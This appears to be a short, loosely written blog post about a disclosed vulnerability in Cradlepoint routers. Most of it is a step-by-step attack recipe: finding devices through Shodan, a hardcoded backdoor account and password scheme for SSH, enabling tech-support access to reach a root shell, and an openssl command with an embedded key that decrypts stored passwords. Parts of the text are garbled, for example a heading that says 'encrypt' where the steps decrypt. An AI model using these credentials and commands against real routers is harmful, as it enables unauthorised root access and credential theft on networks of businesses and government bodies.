Cradlepoint is growing the industry to deliver high-quality networking devices. Such as routers, cloud platform, It also provides services for business and government organization. The Cardpoint also committed to expanding leadership into the emerging 5G space.
The researcher has found critical vulnerability form Cradlepoint router devices. This vulnerability is already reported cradlepoint and full disclosure in August.
What is the vulnerability?
- A hardcoded password allows you to retrieve sensitive information, including the default password: The default password is last 8 characters of WLAN_MAC
- Shodan Search
- Escalate privileges using a backdoor account with a hardcoded username and password
- enable ssh login
- set control.system.techsupport_access true
- login with ssh using u:cproot p:1415 + last 4 bytes of WLAN_MAC
- type ‘sh’ to get root shell
How to encrypt the password?:
- for passwords in the configuration store starting with “$1” the encrypted password is all after the last “$”
- the password can be decrypted using: echo [encrypted password] | openssl enc -d -aes-256-cbc -md sha1 -base64 -nosalt -k “NGJkODg1ZGE1NDhhY2ZhY2VmYjM0MDIzZjA0M2YzNTY=”